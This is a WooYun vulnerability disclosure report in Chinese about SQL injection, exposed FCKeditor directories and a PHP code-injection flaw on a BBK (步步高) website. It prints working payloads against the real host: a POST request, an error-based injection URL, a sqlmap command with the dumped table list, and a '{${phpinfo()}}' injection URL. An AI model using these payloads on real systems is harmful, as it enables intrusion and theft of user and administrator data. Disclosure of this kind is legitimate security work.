当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-096961

漏洞标题:步步高某站多处注入(用户信息泄露及管理员密码)

相关厂商:步步高

漏洞作者: 千斤拨四两

提交时间:2015-02-16 22:25

修复时间:2015-04-02 22:26

公开时间:2015-04-02 22:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-16: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

存在多处sql注入点及敏感目录。

详细说明:

post注入点提交数据http头:

POST /down_soft.php? HTTP/1.1
Host: www.bbktel.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.bbktel.com.cn/down_soft.php?
Cookie: PHPSESSID=h1dpu9m881rabcr7juq64kfcm7; Isz_sid=NGN2g2
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Classid=4&pro_number=&image.x=42&image.y=4


论坛一样存在注入漏洞,floor强制报错语句:

数据库版本号,用户名,数据库名称
http://www.bbktel.com.cn/bbs/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),user(),database(),floor(rand(0)*2))x from information_schema
.tables group by x)a)%23
SQL: SELECT * FROM [Table]usergroups u LEFT JOIN [Table]admingroups a ON u.groupid=a.admingid WHERE u.groupid IN ('10','11','12','\',') and (select 1 from (select count(*),concat(version(),user(),database(),floor(rand(0)*2))x from information_schema.tables group by x)a)#')
Error: Duplicate entry '5.5.23-logbbktel_bbs@localhostbbk_tel1' for key 'group_key'


存在敏感目录

http://www.bbktel.com.cn/fckeditor/editor/filemanager/connectors/test.html
http://www.bbktel.com.cn/fckeditor/editor/filemanager/browser/default/browser.html?Connector=http%3A%2F%2Fwww.bbktel.com.cn%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php


漏洞证明:

sqlmap.jpg


sqlmap.py -r bbg.txt -p Classid --dbs


Database: bbk_tel
[145 tables]
+----------------------------+
| bbk_acting                 |
| bbk_actingpower            |
| bbk_actingscore            |
| bbk_guest                  |
| bbk_tel_actives_tab        |
| bbk_tel_admin_tab          |
| bbk_tel_down_ad            |
| bbk_tel_down_backwall      |
| bbk_tel_down_screen        |
| bbk_tel_guestbook          |
| bbk_tel_huodong_tab        |
| bbk_tel_index_pic          |
| bbk_tel_network_tab        |
| bbk_tel_news_tab           |
| bbk_tel_news_type          |
| bbk_tel_notice             |
| bbk_tel_pingmian_class     |
| bbk_tel_pingmian_tab       |
| bbk_tel_pro_shuoming       |
| bbk_tel_pro_shuoming_class |
| bbk_tel_pro_shuoming_tab   |
| bbk_tel_pro_sms            |
| bbk_tel_pro_soft           |
| bbk_tel_product_discuss    |
| bbk_tel_product_discuss_ty |
| bbk_tel_product_picture    |
| bbk_tel_product_tab        |
| bbk_tel_product_type       |
| bbk_tel_sold_question      |
| bbk_tel_sold_zhishi        |
| bbk_tel_survey             |
| bbk_tel_surveyprize        |
| bbk_tel_system_tab         |
| bbk_tel_vote               |
| bbk_tel_votelog            |
| bbk_tel_voteoptions        |
| bbk_tel_year               |
| bbk_tel_year_book          |
| cdb_access                 |
| cdb_activities             |
| cdb_activityapplies        |
| cdb_addons                 |
| cdb_adminactions           |
| cdb_admincustom            |
| cdb_admingroups            |
| cdb_adminnotes             |
| cdb_adminsessions          |
| cdb_advertisements         |
| cdb_announcements          |
| cdb_attachmentfields       |
| cdb_attachments            |
| cdb_attachpaymentlog       |
| cdb_attachtypes            |
| cdb_banned                 |
| cdb_bbcodes                |
| cdb_caches                 |
| cdb_creditslog             |
| cdb_crons                  |
| cdb_debateposts            |
| cdb_debates                |
| cdb_failedlogins           |
| cdb_faqs                   |
| cdb_favoriteforums         |
| cdb_favorites              |
| cdb_favoritethreads        |
| cdb_feeds                  |
| cdb_forumfields            |
| cdb_forumlinks             |
| cdb_forumrecommend         |
| cdb_forums                 |
| cdb_imagetypes             |
| cdb_invites                |
| cdb_itempool               |
| cdb_magiclog               |
| cdb_magicmarket            |
| cdb_magics                 |
| cdb_medallog               |
| cdb_medals                 |
| cdb_memberfields           |
| cdb_membermagics           |
| cdb_memberrecommend        |
| cdb_members                |
| cdb_memberspaces           |
| cdb_moderators             |
| cdb_modworks               |
| cdb_myposts                |
| cdb_mytasks                |
| cdb_mythreads              |
| cdb_navs                   |
| cdb_onlinelist             |
| cdb_onlinetime             |
| cdb_orders                 |
| cdb_paymentlog             |
| cdb_pluginhooks            |
| cdb_plugins                |
| cdb_pluginvars             |
| cdb_polloptions            |
| cdb_polls                  |
| cdb_postposition           |
| cdb_posts                  |
| cdb_profilefields          |
| cdb_projects               |
| cdb_promotions             |
| cdb_prompt                 |
| cdb_promptmsgs             |
| cdb_prompttype             |
| cdb_ranks                  |
| cdb_ratelog                |
| cdb_regips                 |
| cdb_relatedthreads         |
| cdb_reportlog              |
| cdb_request                |
| cdb_rewardlog              |
| cdb_rsscaches              |
| cdb_searchindex            |
| cdb_sessions               |
| cdb_settings               |
| cdb_smilies                |
| cdb_spacecaches            |
| cdb_stats                  |
| cdb_statvars               |
| cdb_styles                 |
| cdb_stylevars              |
| cdb_tags                   |
| cdb_tasks                  |
| cdb_taskvars               |
| cdb_templates              |
| cdb_threads                |
| cdb_threadsmod             |
| cdb_threadtags             |
| cdb_threadtypes            |
| cdb_tradecomments          |
| cdb_tradelog               |
| cdb_tradeoptionvars        |
| cdb_trades                 |
| cdb_typemodels             |
| cdb_typeoptions            |
| cdb_typeoptionvars         |
| cdb_typevars               |
| cdb_usergroups             |
| cdb_validating             |
| cdb_warnings               |
| cdb_words                  |
| cdb_xreports               |
| notice                     |
+----------------------------+


管理员账户密码:

mima.png


用户信息:

yonghuxinxi.png


敏感信息暴漏:

www.bbktel.com.cn/bbs/misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}}}


phpinfo.png


修复方案:

漏洞太多,慢慢修补吧。

版权声明:转载请注明来源 千斤拨四两@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞评价:

评论